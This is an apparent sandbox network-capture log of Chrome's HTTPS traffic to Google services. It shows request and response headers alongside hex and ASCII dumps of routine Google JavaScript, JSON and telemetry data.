                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:55 UTC1390INData Raw: 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6e 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6e 65 5b 64 5d 2c 63 29 3a 5f 2e 69 65 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e 69 65 28 64 2c 5c 22 64 61 74 61 2d 5c 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 5c 75 30 30 33 64 63 7d 29 7d 3b 6e 65 5c 75 30 30 33 64 7b 63 65 6c 6c 70 61 64 64 69 6e 67 3a 5c 22 63 65 6c 6c 50 61 64 64 69 6e 67 5c 22 2c 63 65 6c 6c 73 70 61 63 69 6e 67 3a 5c 22 63 65 6c 6c 53 70 61 63 69 6e 67 5c 22 2c 63 6f 6c 73 70 61 6e 3a 5c 22 63 6f 6c 53 70 61 6e 5c 22 2c 66 72 61
                                                                                                                                                                                                                                                                                                                          Data Ascii: Name\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:ne.hasOwnProperty(d)?a.setAttribute(ne[d],c):_.ie(d,\"aria-\")||_.ie(d,\"data-\")?a.setAttribute(d,c):a[d]\u003dc})};ne\u003d{cellpadding:\"cellPadding\",cellspacing:\"cellSpacing\",colspan:\"colSpan\",fra


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          9192.168.2.549924142.250.185.2284435836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:55 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:55 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Version: 713742394
                                                                                                                                                                                                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:22:55 GMT
                                                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:55 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          10192.168.2.549954142.250.185.1104435836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:58 UTC733OUTGET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: apis.google.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:58 UTC915INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                                                                                                                                                                                                          Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                                                                                                                                                                                                          Content-Length: 117446
                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 10:02:31 GMT
                                                                                                                                                                                                                                                                                                                          Expires: Mon, 12 Jan 2026 10:02:31 GMT
                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 08 Jan 2025 15:23:05 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                          Age: 22827
                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:58 UTC475INData Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 63 61 2c 64 61 2c 68 61 2c 6d 61 2c 78 61 2c 41 61 2c 42 61 3b 63 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20
                                                                                                                                                                                                                                                                                                                          Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:58 UTC1390INData Raw: 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b 5f
                                                                                                                                                                                                                                                                                                                          Data Ascii: lue;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:58 UTC1390INData Raw: 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 71 61 3b 69 66 28 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 71 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 72 61 3b 61 3a 7b 76 61 72 20 73 61 3d 7b 61 3a 21 30 7d 2c 77 61 3d 7b 7d 3b 74 72 79 7b 77 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 61 3b 72 61 3d 77 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 72 61 3d 21 31 7d 71 61 3d 72 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28 61
                                                                                                                                                                                                                                                                                                                          Data Ascii: unction(a){var b=function(){};b.prototype=a;return new b},qa;if(typeof Object.setPrototypeOf=="function")qa=Object.setPrototypeOf;else{var ra;a:{var sa={a:!0},wa={};try{wa.__proto__=sa;ra=wa.a;break a}catch(a){}ra=!1}qa=ra?function(a,b){a.__proto__=b;if(a
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:58 UTC1390INData Raw: 66 6f 72 28 3b 74 68 69 73 2e 46 66 26 26 74 68 69 73 2e 46 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 46 66 3b 74 68 69 73 2e 46 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d 6e 75 6c 6c 3b 74 72 79 7b 6c 28 29 7d 63 61 74 63 68 28 6d 29 7b 74 68 69 73 2e 6d 71 28 6d 29 7d 7d 7d 74 68 69 73 2e 46 66 3d 6e 75 6c 6c 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 71 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 7a 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 68 3b 0a 7d 29 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 45 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 73
                                                                                                                                                                                                                                                                                                                          Data Ascii: for(;this.Ff&&this.Ff.length;){var h=this.Ff;this.Ff=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=null;try{l()}catch(m){this.mq(m)}}}this.Ff=null};b.prototype.mq=function(h){this.zP(function(){throw h;})};var e=function(h){this.Ea=0;this.wf=void 0;this
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:58 UTC1390INData Raw: 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 68 3d 5f 2e 6c 61 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 68 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 21 31 2c 21 30 2c 68 29 29 3b 68 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70
                                                                                                                                                                                                                                                                                                                          Data Ascii: ("unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledrejection",{cancelable:!0}):(h=_.la.document.createEvent("CustomEvent"),h.initCustomEvent("unhandledrejection",!1,!0,h));h.promise=this;h.reason=this.wf;return l(h)};e.prototyp
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:58 UTC1390INData Raw: 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c 61
                                                                                                                                                                                                                                                                                                                          Data Ascii: one)})};return e});var Ca=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regula
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:58 UTC1390INData Raw: 68 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b 65 28 22 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 22 29 3b 65 28 22 73 65 61 6c 22 29 3b 76 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 46 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 79 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72
                                                                                                                                                                                                                                                                                                                          Data Ascii: hidden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var h=0,k=function(l){this.Fa=(h+=Math.random()+1).toString();if(l){l=_.ya(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Er
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:58 UTC1390INData Raw: 68 69 73 5b 31 5d 2e 53 6b 3d 6d 2e 5a 65 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 53 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 53 6b 3d 0a 6b 2e 5a 65 2e 53 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79
                                                                                                                                                                                                                                                                                                                          Data Ascii: his[1].Sk=m.Ze,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length||delete this[0][k.id],k.Ze.Sk.next=k.Ze.next,k.Ze.next.Sk=k.Ze.Sk,k.Ze.head=null,this.size--,!0):!1};c.prototy
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:58 UTC1390INData Raw: 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 79 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65
                                                                                                                                                                                                                                                                                                                          Data Ascii: tion(){if(!a||typeof a!="function"||!a.prototype.entries||typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ya([c]));if(!d.has(c)||d.size!=1||d.add(c)!=d||d.size!=1||d.add({x:4})!=d||d.size!=2)return!1;var e=d.entries(),f=e.ne
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:58 UTC1390INData Raw: 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 29 3b 0a 6d 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7d 29 7d 7d 29 3b 6d 61 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 5f 2e 6c 61 7d 29 3b 6d 61 28 22 53 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ay.prototype.entries",function(a){return a?a:function(){return Fa(this,function(b,c){return[b,c]})}});ma("Array.prototype.keys",function(a){return a?a:function(){return Fa(this,function(b){return b})}});ma("globalThis",function(a){return a||_.la});ma("St


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          11192.168.2.549966172.217.18.144435836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:59 UTC726OUTPOST /log?format=json&hasfast=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: play.google.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Content-Length: 913
                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                          Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                                                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:59 UTC913OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 36 36 39 38 39 37 37 31 39 38 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c
                                                                                                                                                                                                                                                                                                                          Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1736698977198",null,null,null,
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:59 UTC945INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                                                                                                          Set-Cookie: NID=520=S9d7sdE7O3Dw1Df6XnYfuAHgf9x4dmwysgYnUyvsoKLVCUcm-gJFWNbv1iqpAYicgBTIG7JHMgkGW0PjyDtHBogezH3lg_GnazAVZtvuwWdrpqQJvHzYa4muPVmvnLgqMQ1z8GKkgl29gX0T8JFCyDL2bUQvkmvO4KU4qUsyoKSMtoxhv-nhUPW3I-s; expires=Mon, 14-Jul-2025 16:22:59 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
